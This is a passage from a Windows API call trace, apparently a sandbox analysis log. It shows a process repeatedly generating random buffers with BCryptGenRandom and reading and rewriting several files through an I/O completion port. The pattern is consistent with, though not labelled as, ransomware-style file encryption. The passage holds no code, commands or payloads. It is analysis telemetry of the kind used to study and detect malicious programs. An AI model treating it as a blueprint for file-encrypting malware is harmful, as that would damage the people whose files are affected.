0x753f1e2e [0138.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.633] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.633] free (_Block=0x3e305b8) [0138.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.633] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.633] free (_Block=0x1fa91d0) [0138.633] free (_Block=0x77d7a8) [0138.633] free (_Block=0x1fa90b8) [0138.633] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.635] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.668] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3a14, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.684] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.687] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x18b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.749] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.757] CloseHandle (hObject=0x3cc) returned 1 [0138.757] free (_Block=0x3e70008) [0138.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.764] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.764] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.764] free (_Block=0x3e305b8) [0138.764] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.764] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.765] free (_Block=0x1fa91d0) [0138.765] free (_Block=0x77d7a8) [0138.765] free (_Block=0x1fa90b8) [0138.765] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.775] CloseHandle (hObject=0xec) returned 1 [0138.775] free (_Block=0x3df0008) [0138.775] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.777] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x229c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.780] CloseHandle (hObject=0x3cc) returned 1 [0138.781] free (_Block=0x3d70450) [0138.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.804] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x305c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.816] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1364, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.835] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.851] CloseHandle (hObject=0xec) returned 1 [0138.851] free (_Block=0x3e70008) [0138.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.858] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.869] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x203c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.878] CloseHandle (hObject=0x170) returned 1 [0138.878] free (_Block=0x3df0008) [0138.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.884] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2b04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.902] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.903] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.903] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.903] free (_Block=0x3e305b8) [0138.903] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.903] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.904] free (_Block=0x1fa91d0) [0138.904] free (_Block=0x77d7a8) [0138.904] free (_Block=0x1fa90b8) [0138.904] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.914] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.914] free (_Block=0x3e305b8) [0138.914] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.914] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.914] free (_Block=0x1fa91d0) [0138.914] free (_Block=0x77d7a8) [0138.914] free (_Block=0x1fa90b8) [0138.914] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.925] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.926] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.927] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.930] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.956] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1424, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.957] CloseHandle (hObject=0x170) returned 1 [0138.957] free (_Block=0x3df0008) [0138.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.965] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.965] free (_Block=0x3e305b8) [0138.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.965] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.965] free (_Block=0x1fa91d0) [0138.966] free (_Block=0x77d7a8) [0138.966] free (_Block=0x1fa90b8) [0138.966] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.967] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.978] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1034, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.988] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.988] CloseHandle (hObject=0x170) returned 1 [0138.988] free (_Block=0x3df0008) [0138.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.995] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.995] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.996] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.996] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.996] free (_Block=0x3e305b8) [0138.996] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.996] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.996] free (_Block=0x1fa91d0) [0138.996] free (_Block=0x77d7a8) [0138.996] free (_Block=0x1fa90b8) [0138.996] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.998] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.999] CloseHandle (hObject=0x170) returned 1 [0138.999] free (_Block=0x3df0008) [0138.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.007] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.007] free (_Block=0x3e305b8) [0139.007] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.007] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.007] free (_Block=0x1fa91d0) [0139.007] free (_Block=0x77d7a8) [0139.008] free (_Block=0x1fa90b8) [0139.008] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.009] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 